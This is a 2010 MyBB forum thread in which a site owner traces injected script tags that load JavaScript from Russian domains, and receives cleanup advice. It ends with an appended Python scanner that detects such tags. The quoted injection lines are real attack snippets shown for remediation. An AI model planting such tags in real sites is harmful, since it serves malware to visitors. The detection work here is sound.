MyBB Community Forums

Full Version: Unknown Javascript Running - How to remove
A few members have been complaining that when they accessed my site, their internet security has been flagging up warnings.

One of my members kindly found the following on my index:

<!-- end: index --><script type="text/javascript" src="http://stupiddomain.ru/Laptop.js"></script>
<!--6d9d2ecfc24af862611535a01848d3f3-->

Which possibly relates to:

http://blog.unmaskparasites.com/2010/06/...ns-part-2/

I looked into it using Firebug but I cannot find the data to remove:

<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<style>
<style>
<head>
<body>
<div id="container">
<div id="unofficial">
<script type="text/javascript">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"/>
<script type="text/javascript">
<script type="text/javascript">
<noscript/>
<script type="text/javascript" src="http://chickcase.ru/Laptop.js"/>
</body>
<style type="text/css">
</html>

Does anyone have any suggestions where to look / what to remove.

This is very important.

Many Thanks

Cheers

DoN
Seems to be in index.php, do a search in this file and see what you find. I'd also change your FTP password, and make sure files don't have higher CHMOD permissions than they need.
Hi Matt,

Been a while since you last helped me :)

Anyway, thank you for the help. I have located the code and removed it from the index.php from both my live and test site.

However, I have also noticed something else. I am using Google Chrome, which, when you click on a link, displays the progress on the left-hand side of the page.

Clicking on any link then has the following sequence:

Connecting.....
waiting for www.vampirecounts.net
connecting.....
waiting for pocketbloke.ru <--- As far as I know this is nothing to do with my site

The pocketbloke concerns me - I also still got a warning from Kaspersky when I logged onto the site:

17/08/2010 20:42:56 Google Chrome Denied: http://jackgas.ru:8080/index.php?Iva2dqm...qm5insa=.0 (analysis using the database of suspicious URLs) http://jackgas.ru:8080/index.php?Iva2dqm...qm5insa=.0 URL found in the database

Any further suggestions on what I need to do?

Cheers

DoN

EDIT:

Further updates:

It appears that smileys have stopped working and that accessing the site is causing some browsers to crash. This is now getting urgent if anyone can please assist.
Hmm, you've got this code in all your javascript files too. What I'd do is upload all your files again, to make sure nothing else has been affected.
Just all the javascript files? If I upload everything, then won't I lose custom coding etc.?
At minimum the javascript files but I'd upload everything again to make sure the files are clean; if you've edited any files, don't overwrite those but I'd still check them manually for this code that's getting added in.
Sorry to keep bothering you, but I want to make sure I am fully secure. I have realised I have been uploading using FTP, not SFTP. Can you please recommend a client to use SFTP?
Hi, the same type of hacking actually occurred with MyBBRunway yesterday. It was a different domain (but also Russian), and linked to Emoticon.js on their domain. It was placed in all of the Javascript files, and the guys also messed up the WordPress installation.

I know this because it was in the same type of format on the template:

<!-- end: index --><script type="text/javascript" src="http://somerandomdomain.ru/Emoticon.js"></script>
<!--Somenumbersletters-->

Do you run WordPress?

2000th Post!!!! :D
Hi,

No, I don't have WordPress.

I have just deleted the javascript folder and uploaded it fresh, and the problem is still there. The smilies still don't work and Chrome still shows that unknown address when loading the page.

Is there anywhere else you recommend I look? As I said, replacing the full file structure will mean loss of my theme and coding etc.

Any suggestions?

Cheers

DoN

Nagsh, I reuploaded a clean version of MyBB and changed my FTP, Database, Root, SSH, etc passwords. I am not sure how they got into my WordPress and MyBB files. Must be FTP :s
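
Added example (not part of the original thread and not MyBB code): a small Python scanner for the pattern quoted in the posts above, a `<script>` tag loading from an unexpected external host, and a 32-hex-digit HTML comment like the one that followed it. The allow-list, the file extensions, the host name `unknown-host.example` and the sample input are assumptions constructed for illustration.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Assumption: hosts this site intentionally loads scripts from; adjust per site.
ALLOWED_HOSTS = {"www.google-analytics.com"}
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")

# A <script> tag whose src is an absolute http(s) URL.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["'](https?://[^"']+)["']""", re.I)
# An HTML comment holding exactly 32 hex digits, like the marker in the first post.
HEX_MARKER = re.compile(r"<!--[0-9a-f]{32}-->", re.I)

# Constructed sample modelled on the snippet quoted in the thread.
SAMPLE = (
    '<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>\n'
    '<!-- end: index --><script type="text/javascript" src="http://unknown-host.example/Laptop.js"></script>\n'
    '<!--0123456789abcdef0123456789abcdef-->\n'
)

def scan_text(text):
    """Return a list of (line_number, kind, detail) findings for one file's text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for url in SCRIPT_SRC.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                findings.append((no, "external-script", host))
        marker = HEX_MARKER.search(line)
        if marker:
            findings.append((no, "hex-marker", marker.group(0)))
    return findings

def scan_tree(root):
    """Walk root and return {path: findings} for scanned files with any finding."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                # errors="replace" keeps the scan going on files with odd encodings.
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[path] = hits
    return report

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

Run it against a local copy of the forum directory; any file it lists should be compared with a clean copy from the original MyBB package before being put back on the server.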